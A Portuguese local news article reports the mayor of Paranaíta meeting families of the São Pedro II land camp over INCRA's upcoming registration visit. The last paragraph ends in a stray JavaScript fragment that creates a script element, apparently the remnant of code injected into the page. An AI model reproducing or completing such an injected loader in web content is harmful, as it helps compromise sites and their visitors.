Capa / Cidades / Paranaíta comemora mais um avanço do Acampamento São Pedro

Paranaíta comemora mais um avanço do Acampamento São Pedro

Prefeito de Paranaíta comemora mais um avanço do Acampamento São Pedro IIAssessoria

O Administrador paranaitense, Tony Rufatto, esteve reunido com os acampados do Assentamento São Pedro II, para comemorar o fato de que o INCRA de Sorriso foi notificado, e já comunicou à Presidência que vai deslocar uma equipe até o acampamento a qualquer momento, para fazer a Sipração dos associados. A reunião aconteceu no Domingo, 14 de fevereiro.
“Este é um momento muito importante, meu coração está em festa. O Assentamento São Pedro por muito tempo, em época de crise maior, foi o setor que mais movimentou a economia de Paranaíta e com este novo assentamento, São Pedro II, não será diferente, as empresas que constroem usinas vão embora, outras empreendimentos também, mas nós teremos vocês, famílias produtoras, para fomentar nosso comércio e garantir emprego, renda e alimento na mesa de todos, por isso, podem contar com a nossa administração, seremos sempre parceiros para o que der vier “,comemorou Rufatto.
A presidente dos acampados, Leonor Leão, estava muito otimista e entusiasmada em poder reunir com os seus associados e levar uma grande notícia da pré Sipraçao “Dona Leonora”, como é conhecida, comentou que não poderia ficar só pra ela esta alegria e que precisava compartilhar com todos esta conquista e aproveitou a presença do prefeito Tony Rufatto para agradecer o empenho do gestor para solucionar esta questão dos acampados.
“O prefeito é padrinho deste acampamento, e a presença do ‘seo’ Tony aumenta ainda mais a confiança que o povo tem nele, ele acompanha nossa luta e apoia em tudo o que é necessário e possível e acende a nossa esperança de conquistarmos o nosso pedaço de chão e dizer, este é nosso”, disse Leonora.
Uma agenda com o Incra de Cuiabá está marcada para o dia 29 de fevereiro, onde membros da diretoria, presidente dos acampados Leonor Leão e o prefeito Tony Rufatto irão receber o Laudo Positivo da àrea requisitada com INCRA.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top